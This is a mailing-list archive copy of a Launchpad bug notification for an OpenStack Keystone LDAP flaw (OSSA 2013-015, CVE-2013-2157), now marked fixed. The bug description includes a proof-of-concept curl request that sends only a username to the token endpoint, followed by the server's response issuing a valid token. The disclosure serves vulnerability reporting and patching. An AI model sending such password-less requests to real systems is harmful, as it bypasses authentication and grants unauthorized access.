yahoo-eng-team team mailing list archive

Thread
Date

[Bug 1187305] Re: [OSSA 2013-015] LDAP vulnerability when checking user credentials (CVE-2013-2157)

To: yahoo-eng-team@xxxxxxxxxxxxxxxxxxx
From: Morgan Fainberg <morgan.fainberg@xxxxxxxxx>
Date: Wed, 04 Jun 2014 23:26:55 -0000
Reply-to: Bug 1187305 <1187305@xxxxxxxxxxxxxxxxxx>
Sender: bounces@xxxxxxxxxxxxx

** Changed in: keystone/folsom
       Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Keystone.
https://bugs.launchpad.net/bugs/1187305

Title:
  [OSSA 2013-015] LDAP vulnerability when checking user credentials
  (CVE-2013-2157)

Status in OpenStack Identity (Keystone):
  Fix Released
Status in Keystone folsom series:
  Fix Released
Status in Keystone grizzly series:
  Fix Released
Status in OpenStack Security Advisories:
  Fix Released

Bug description:
  There is a security vulnerability in the LDAP module when retrieving a
  token while checking the credentials of a user.

  If the password field is not specified, the ldap module does not do
  the simple_bind and it always returns a valid connection.

   curl -i https://lxbrf17b01.cern.ch:5000/v2.0/tokens -X POST -H
  "Content-Type: application/json" -d '{"auth":
  {"passwordCredentials":{"username":"jcastro"}}}' --insecure

  HTTP/1.1 200 OK
  Vary: X-Auth-Token
  Content-Type: application/json
  Content-Length: 223
  Date: Tue, 04 Jun 2013 08:30:31 GMT

  {"access": {"token": {"expires": "2013-06-05T08:30:31Z", "id":
  "cec066b8d1df485a9d90e25b555ac0ff"}, "serviceCatalog": [], "user":
  {"username": "jcastro", "roles_links": [], "id": "jcastro", "roles":
  [], "name": "jcastro"}}}

To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1187305/+subscriptions